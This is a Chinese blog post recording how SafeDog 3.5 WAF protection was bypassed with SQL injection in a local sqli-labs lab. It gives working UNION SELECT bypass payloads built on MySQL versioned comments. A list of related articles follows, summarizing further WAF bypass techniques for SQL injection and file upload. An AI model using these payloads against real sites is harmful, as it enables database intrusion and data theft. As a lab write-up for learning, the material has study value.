安全狗3.5版本SQL注入绕过

最新推荐文章于 2023-08-02 18:13:09 发布
最新推荐文章于 2023-08-02 18:13:09 发布
阅读量415 收藏 3
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40052958/article/details/118895192
版权

环境搭建:

phpstudy+sqli-labs-master

安全狗版本:

 出现问题:新版安全狗Apache服务无法启动问题

管理员模式启动cmd,进入phpstudy部署目录phpstudy_pro\Extensions\Apache2.4.39\bin下

执行命令:httpd -k install -n apache2.4

环境搭建完毕,验证安全狗正常拦截开搞开搞!!!

从上面验证看来就是针对union 和select的组合进行拦截

网上研究了一早上都不行,就在差点放弃的时候看到一位老哥的分享,搞定!!!

?id=-1/**//*!60000xxx*//*!union*//**//*!60000xxx*//*!select*//**/1,2,3

/*!60000*/含义是mysql版本6以上才会执行中间的参数

之前试过?id=-1/**//*!50000union*//**//*!50000select*//**/1,2,3也不行,没想到/*!60000xxx*/这个操作,估计安全狗下个版本这个也搞不定了,如果大佬们有其他方法还请分享交流!

 参考https://www.freebuf.com/news/topnews/253220.html

?id=-1 union /*//--/*/ select 1,2,3(这个也行 参考文章

soleil_h
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入-安全狗apache最新版绕过
crowsec
01-26 1563
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01背景知识 现在的环境下对web选手越来越不友好,如果想在web场景中去挖洞,基本上都要面对waf,而常用的waf产品有很多,本次以开源免费最新版安全狗为例,绕过waf获取数据。 tips:本文需要您提前掌握一定的基础知识! 02环境配置 Windows10主机 phpstudy2018 sqli-labs靶场 安全狗apache4.0.30255 当前版本是最新版安全狗(截止2021.05.17) ...
SQL绕安全狗【本地环境随便耍耍】
m0_49420271的博客
06-22 299
本地搭建的环境绕过安全狗防护,随便耍耍的记录~
SQL注入绕过安全狗
blackguest07的博客
01-12 2218
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
SQL注入-安全狗apache3.5.12048版本超大数据包绕过
crowsec
06-01 423
更新日期:2021.04.14 0x01 测试条件 这个是get请求的,要求对方可以接收post请求,也就是说对方应该是request 在发送请求的时候,要将bp的请求方式修改为post型 将安全狗的cc防攻击功能关闭 0x02 代码 # -*- encoding: utf-8 -*- # Time : 2021/04/14 15:33:48 # Author: crow import requests ''' POST http://10.211.55.9/Less-1/ .
SQL注入如何绕过WAF】
qq_55213436的博客
07-15 1362
不知道各位在平时的sql注入漏洞挖掘的过程中是否经常会遇到这样那样版本安全狗,虽然说安全狗十分的可恶。今天就分享几种常见的安全狗绕过方法,亲测有效。特别是最后两种方法,100%绕过最新版本安全狗。.........
mysql注入fuzz字典_sql注入fuzz bypass waf
weixin_30467861的博客
01-28 746
本帖最后由 xmidf 于 2018-7-11 10:16 编辑作者:whynot 转自:先知0x0 前言这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测一般的注入还是很好判断的,特别是基于报错,但有...
堆叠注入,waf绕过 安全狗为主(18)
san3144393495的博客
05-06 309
讲这个例子,堆叠注入他的一个用处,注入的时候需要获取到管理员的账户密码,但密码是加密的,加密经常揭秘不出来,很正常,可以利用这个注入实现堆叠注入,就是插入数据,诸如的时候向管理员这个表里面插入一个数据,成功的给管理员添加一个新用户,之后在用插入的用户名密码去登陆,就不需要考虑密码解不出来。基本上一些常见漏洞都检测,他的检测是插件的那种方法,每次更新也都是更新的插件,他会对还会对工具检测的一些常见的工具,nmap,菜刀,sqlmap,和xxs漏洞检测等基本上的都会检测,默认的检测项目是url。
Sql注入--Waf绕过姿势
一期一会的博客
12-31 710
前言 waf(Web Application Firewall)全称为“Web应用防护系统”,通俗的讲,waf的目的是过滤请求包,正常来讲访问一个网站不会拦截你的请求包,如果你的请求包内带有一些参数会危害到网站,waf此时就起到了作用。waf算作代理防火墙中的一种。 0x00 环境准备 在这里利用phpstudy搭建一个sqli-labs环境,下载的sqli-labs安装包放至D:\phpstudy\PHPTutorial\WWW目录 开启phpstudy,访问成功 接下来在主机下载一个网站安全狗a
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
SQL注入绕过实战案例
08-31
SQL sqli-labs-master 靶场搭建
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
SQL注入绕过的技巧总结
09-09
主要给大家总结了一些关于SQL注入绕过的技巧,其中包括引号绕过、逗号绕过以及比较符(<,>)绕过,文中给出了详细的介绍和示例代码,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
安全狗V3.512048版本绕过
m0_66299232的博客
08-02 1211
全狗 safedogwzApacheV3.5.exe 右键电脑右下角安全狗图标-->选择插件-->安装插件 以管理员身份运行cmd安装apache服务 httpd -k install -n apache2.4 将服务写上,安装成功之后,注意不要选择在线安装服务器安全狗,安装之后会显示启动web服务失败,这里将phpstudy重启即可 使用恶意的参数进行测试下,安全狗生效 http://192.168.126.137/sqli-lab/Less-1/?id=1' union select 1,2,3 --
文件上传绕过安全狗V3.5---绕过WAF---uploadlabs
z2560088的博客
01-16 2286
目录 环境: 测试: 1.数据溢出-防匹配 参数;saldmsakdsaxxsadsa(垃圾数据);参数 2.符号变异-防匹配 1 "Getzwt.php:"文件名后加: 2 filename========"Getzwt.php"​ 3.破坏数据包的完整性 1 去除formdata 2 去除content-type参数 4 重复数据-防匹配 1 filename=;filename="Getzwt.php" 参数之间以;分隔,让waf认为filename=null从而绕...
SQL注入 安全狗apache3.5.12048版本绕过
crowsec
01-26 1194
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021.04.28 前言 没错,这次我们又来了,还是那条狗,绕过的是安全狗apache3.5.12048版本,个人感觉这个狗比上次的那个有难度些。上次发的文章里面没安全狗的文件,因为当时安装之后文件就删了,这次有,后台回复关键字: 安全狗3.5 获取 目前我们已经发布关于sql注入的文章和教学: 2019.11.20 更新sqli-labs 全部视频更新完成 SQL注入-安全狗超大数据包绕过 SQL...
SQL注入绕过安全狗的五种方法
01-11 1264
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
突破安全狗
duan_qiao925的博客
06-05 779
实验准备 Sql注入原理:用户能控制输入并构造恶意参数(多为sql语句),Web应用执行的代码拼接了未加过滤的nei'rong。
患者发生输液反应的应急预案及护理流程(医院护理资料).docx
最新发布
06-15
患者发生输液反应的应急预案及护理流程(医院护理资料).docx
sql注入绕过防火墙
12-01
为了绕过防火墙的SQL注入,可以使用一些技巧和方法,例如: 1. 双写绕过:在SQL注入语句中,将关键字双写,例如将SELECT写成SSELECT,将UNION写成UUNION,这样可以绕过一些简单的防火墙。 2. 使用特殊字符:在SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值